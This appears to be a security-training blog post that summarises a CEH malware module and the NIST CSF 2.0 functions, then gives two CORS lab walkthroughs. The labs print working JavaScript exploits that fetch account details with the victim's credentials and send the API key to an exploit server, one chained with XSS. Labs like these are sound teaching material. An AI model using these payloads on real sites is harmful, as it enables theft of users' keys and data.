securiumsolutions

Understanding Malware Threats

Malware is a harmful tool used by hackers to mess up systems, steal important data and shut down whole system. CEHv13’s Module 05: Malware Threats helps ethical hackers learn about malware, how it works and multiple ways to stop it.

The importance of this topic is to:

• Spot Malware: Learn to identify signs of malware in a system.
• Analyze Threats: Understand how malware works and what it can do.
• Defend Systems: Protect systems from being attacked by malware.

What is Malware?

Malware is a program or code created to harm, exploit or gain unauthorized access to systems and networks. From stealing sensitive data to disrupting critical operations, malware is a versatile and dangerous tool for attackers.

Main Topics :

#Types of Malware

1. Viruses

Viruses are malicious programs that infect files and spread when those files are executed. They require user action, such as opening an infected file or running the program, to activate. Once active, they can corrupt data, slow down systems, and even disable important functionalities.

2. Worms

Worms are similar to viruses but differ in one key aspect—they spread across networks without needing user action. Worms exploit vulnerabilities in systems or software to replicate themselves.

3.Trojans

Trojans are destructive programs that show themselves as legitimate software to trick users into installing them. Once installed, they can create backdoors for attackers, steal sensitive information, or even allow remote control access. Trojans often spread through phishing emails, malicious ads, or fake downloads.

4. Ransomware

Ransomware is a highly disruptive type of malware that encrypts files or locks entire systems, demanding a random payment to restore access. It typically spreads through phishing emails, malicious links. Ransomware mostly attack businesses and individuals by holding critical data hostage.

5. Spyware

Spyware secretly monitors user activities and collects sensitive data, such as passwords, credit card details, or browsing history. It often enters systems as part of legitimate-looking software or through vulnerabilities. Spyware is dangerous because it operates in the background, mostly without the user’s knowledge.

6. Adware

Adware is software designed to display advertisements. While sometimes simply annoying, adware can also collect user data or redirect users to malicious websites. It often comes bundled with free software downloads, and it is not always harmful but it can slow down systems and compromise privacy.

7. Rootkits

Rootkits are a type of malware that gives attackers root access to a system, enabling them to hide their presence and control the system entirely. They are challenging to detect because they operate deep within the system, bypassing traditional security measures.

8. Fileless Malware

Fileless Malware is a type of malware that operates entirely in a system’s memory, leaving no files behind. This makes it extremely difficult to detect using antivirus tools. It often exploits vulnerabilities in running applications or uses malicious scripts to execute its payload.

#Malware Analysis Techniques

1. Static Analysis

Static analysis involves examining the malware without executing it. By analyzing the code, file structure, and resources, security professionals can identify the malware’s capabilities .

What It Involves:

• Scanning the file using antivirus tools or hash databases.
• Reviewing code such as file deletion or encryption routines.
• Inspecting metadata for clues about the malware’s origin and functionality.

Benefits:

• Quick way to find if a file is malicious.
• Helps detect techniques used to hide malware.

2. Dynamic Analysis

Dynamic analysis is about observing how the malware behaves when it runs. This is done in a secure, isolated environment to prevent harm to real systems.

What It Involves:

• Running the malware in a sandbox to see what files it creates, modifies, or deletes.
• Monitoring its network activities.
• Capturing registry changes.

Benefits:

• Provides a clear picture of the malware’s behavior and impact.

3. Reverse Engineering

Reverse engineering is a method where the malware’s code is decompiled and analyzed to fully understand its purpose and functionality.

What It Involves:

• Decompiling the malware to break it down into readable code.
• Identifying algorithms used for encryption, data exfiltration, or persistence.
• Understanding how the malware interacts with the system and evades detection.

Benefits:

• Helps in creating patches to counter the malware.
• Essential for analyzing advanced malware, such as ransomware.

#Delivery Mechanisms of Malware

Some common methods how attackers deliver the malware to victim:

• Phishing Emails
• Drive-by Downloads
• USB Drives

#Countermeasures and Defenses

The module doesn’t just focus on threats – it teaches you how to defend against them.

Antivirus : Regularly updated tools to detect and remove malware.
Endpoint Protection: Tools to secure endpoints like laptops and phones.
Patch Management: Keeping software up to date to fix vulnerabilities.
User Awareness Training: Educating users to recognize phishing attempts and malicious links.
Network Segmentation: Limiting the spread of malware by isolating systems.

Conclusion

This module helps you understand how attackers thinks and how to defend against the malware. We learned about advanced malware techniques or implementing effective defenses, this module prepares you to stay one step ahead from the attackers.

This module has complete knowledge of malwares and how to defend against them.

What is NIST? Lets take a look:

NIST stands for the National Institute of Standards and Technology. It is a federal agency within the U.S. Department of Commerce that develops and promotes measurement standards, guidelines, and technologies to enhance innovation and industrial competitiveness. NIST plays a key role in areas such as cybersecurity, manufacturing, and scientific research.

About NIST CSF:

The NIST Cybersecurity Framework (CSF) is a comprehensive guide designed to help organizations manage and reduce cybersecurity risks. Developed by the National Institute of Standards and Technology (NIST), the CSF provides a flexible, risk-based approach to cybersecurity that can be applied across various industries and types of organizations, both public and private.

The Latest version is NIST’s CSF v2.0.

As we can see NIST CSF has 6 functions named as:

1. Govern
2. Identify
3. Protect
4. Detect
5. Respond
6. Recover

Short Explanation of Functions and their categories:

Govern: The Govern function integrates governance, risk management, and oversight activities to ensure that cybersecurity is aligned with business objectives, regulatory requirements, and risk management strategies. It was introduced to bring a more holistic and strategic focus to cybersecurity management across the organization.

Categories of Govern function:

i. Organizational Context: emphasizes the need for organizations to understand their business environment and strategic objectives before they can implement effective cybersecurity measures.
ii. Risk Management: Risk context for business is set out.
iii. Roles, Responsibilities, and Authorities: Roles, responsibilities and authorities should be defined inside the organization in a clear manner.
iv. Policy: Policies for managing cybersecurity should be defined. Which includes Cybersecurity Policy Development, Communication & Enforcement, Alignment with Organizational Goals
v. Oversight: Continuous monitoring and evaluation of cybersecurity activities.
vi. Supply Chain: includes Third-party Risks, Supply Chain Resilience, Due Diligence & Monitoring

Identify: The identity function is related to identifying the assets you want to protect, for protecting our assets we must identify them first.

It has 3 categories of control:

i. Asset management: Asset management means identifying and recording all the assets you want to secure/protect.
ii. Risk assessment: Assessing the risk related to all the assets.
iii. Improvement: Identify the improvements that can be made to secure assets.

Prevent: This category is related to the preventive measures related to the assets.

It has 5 categories:

i. Identity management, Authentication and access: Also known as IAM(Identity and access management) , it is important for verifying who can access the assets and what can they access.
ii. Awareness and Training: It is important to educate our employees and users about secure practices. This can reduce the cyber risks.
iii. Data security: It is related to data so as to protect its confidentiality, integrity, and availability of the data .
iv. Platform security: Increases security by ensuring that the hardware, operating software and applications used to store and process the data are secured.
v. Technology Infrastructure Resilience: Ensure that there is resilient architecture to ensure that network and platform can withstand attacks.

Detect: to make sure to detect attacks at their earliest stage.

It has 2 categories:

i. Continuous monitoring :There should be a continuous monitoring team to ensure proper monitoring of the platform and network. So that attacks can be detected . e.g SOC team.
ii. Adverse Event Analysis: Not all potential threats are actual threats and this category is important for that , it is to identify threats by identifying/analyzing the events.

Respond: It is related to responding to the threats that are found.

It has 4 Categories:

i. Incident management: It refers to managing the incident from the poit it is identified to the end.
ii. Incident Analysis: It is related to analyzing the threat by events and other data .
iii. Incident Response, Reporting, and Communication: This involves responding to the incident and formal reporting and external communication like – to the investors , users etc.
iv. Incident Mitigation: Incidents must be dealt with quickly and should be mitigated.

Recover: This involves recovering from the incidents like – restoring data etc

It has two categories:

i. Incident Recovery Plan Execution: Once the incident is contained we need to think about recovering any damaged or lost data and any services that have been disrupted.

ii. Incident Recover Communications: Just as we need to keep internal and external stakeholders informed of the state of our incident response, we need to maintain these communications during service recovery.

Introduction to CORS

CORS is a security thing in browsers that decides if a website can get stuff from another website. Normally browsers don’t let websites steal info from other sites. But with CORS websites can say it’s fine for certain sites to get their stuff.

If CORS is wrong, attackers could steal info or do stuff for you without you knowing.

What is a Trusted Null Origin Vulnerability?

A trusted null origin vulnerability occurs when a server improperly trusts requests with the Origin: null . This can happen iwhere the server’s CORS policy allows malicious or undefined origins to interact with it. Attackers can exploit this misconfiguration to bypass CORS protections and steal sensitive data, such as API keys or user information.

Lab Description

In this lab, we will exploit a CORS vulnerability with a trusted null origin to extract the administrator’s API key.

Lab URL:  CORS Vulnerability with Trusted Null Origin Lab

Steps to Reproduce the Vulnerability

1. Log in to the application using the provided credentials.

2. Disable intercept in Burp Suite and navigate to “My Account” using Burp’s browser.

3. In Burp Suite’s history, find the /accountDetails request. Note the Access-Control-Allow-Credentials header in the response.

4. Send the request to Burp Repeater, add the header Origin: null, and resubmit it. Observe that the Access-Control-Allow-Origin reflects “null.”

5. Write and host the following HTML exploit script on the provided exploit server:

<script>
var req = new XMLHttpRequest();
req.onload = function() {
document.location = ‘https://exploit-0a61006204ebace580cd8fa5014a00c1.exploit-server.net/’ + req.responseText;
};
req.open(‘GET’, ‘https://0a00000104c1aa31803021e800580091.web-security-academy.net/accountDetails’, true);
req.withCredentials = true;
req.send();
</script>

6. Trigger the exploit and deliver it to the victim.
7. Check the exploit server’s access logs to retrieve the administrator’s API key.

8. Submit the key to solve the lab.

Conclusion

This lab shows how a bad CORS setup trusting the null origin can leak sensitive data. To fix this:

• Don’t trust the null origin in CORS.
• Use a strict list of allowed sites.
• Keep testing CORS to find issues.

By getting CORS right, companies can make their websites safer and protect user data from attackers.

Let’s take another lab to understand CORS

Exploiting CORS Vulnerability with Trusted Insecure Protocols

CORS misconfigurations can allow requests from insecure origins (like HTTP subdomains). This can expose sensitive data when combined with other vulnerabilities, such as XSS.

Lab URL: CORS Vulnerability with Trusted Insecure Protocols

Steps to Reproduce the Vulnerability

1. Log in using Burp’s browser and turn off intercept.

2. Check the /account Details request in the history and observe the Access-Control-Allow-Credentials header.

3. Send the request to Burp Repeater and add the header Origin: http://subdomain.lab-id.

4. Open a product page and click “Check stock.” Notice that data is fetched over an insecure HTTP subdomain.

5. Replace YOUR-LAB-ID with your lab URL and YOUR-EXPLOIT-SERVER-ID with your exploit server ID in the script.

<script> document.location=”http://stock.YOUR-LAB-ID.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open(‘get’,’https://YOUR-LAB-ID.web-security-academy.net/accountDetails’,true); req.withCredentials = true;req.send();function reqListener() {location=’https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key=’%2bthis.responseText; };%3c/script>&storeId=1″ </script>

6. Click View exploit and confirm the API key appears in the URL. Then, click Deliver exploit to victim and access the log on the exploit server.